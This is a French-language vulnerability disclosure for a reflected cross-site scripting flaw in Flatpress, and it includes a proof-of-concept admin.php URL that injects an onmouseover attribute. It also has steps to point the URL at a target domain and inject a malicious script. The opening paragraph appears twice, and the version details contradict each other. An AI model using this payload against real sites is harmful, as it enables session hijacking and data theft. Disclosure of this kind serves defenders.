
Une vulnérabilité de type cross-site scripting (XSS) a été identifiée dans Flatpress 1.3. Cette vulnérabilité permet à un attaquant d'injecter des scripts malveillants dans les pages web consultées par d'autres utilisateurs.
Une vulnérabilité de type cross-site scripting (XSS) a été identifiée dans Flatpress 1.3. Cette vulnérabilité permet à un attaquant d'injecter des scripts malveillants dans les pages web consultées par d'autres utilisateurs.
Type de vulnérabilité : Cross Site Scripting (XSS)
Fournisseur du produit :
flatpress CMS
Code de base du produit affecté :
Flatpress v1.3 - sera corrigé dans la version 1.3 de FlatPress.
Composant affecté : URL
Autres impacts du CVE : Un attaquant peut exploiter cette vulnérabilité pour exécuter du code arbitraire dans le contexte du navigateur d'un utilisateur, ce qui peut potentiellement mener à diverses activités malveillantes telles que le vol d'informations sensibles, le détournement de session ou la propagation de logiciels malveillants.
Référence : https://medium.com/@Parag_Bagul/preventing-cross-site-scripting-xss-attacks-with-the-html-special-characters-function-in-php-1b9db17bcdb4 https://owasp.org/www-community/attacks/xss/
POC :
Accédez à l'URL suivante : http://127.0.0.1/flatpress-1.2.1/admin.php?p=entry&entry=bmnik"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"vqtz3&action=write
Remplacez "127.0.0.1" par le nom de domaine du site web cible.
Injectez le script malveillant pour déclencher la vulnérabilité XSS.
Vidéo POC : https://drive.google.com/file/d/1CpVab51tsM-JXvgeSPzljhWbd91OTbxF/view
Découvreur : Parag Bagul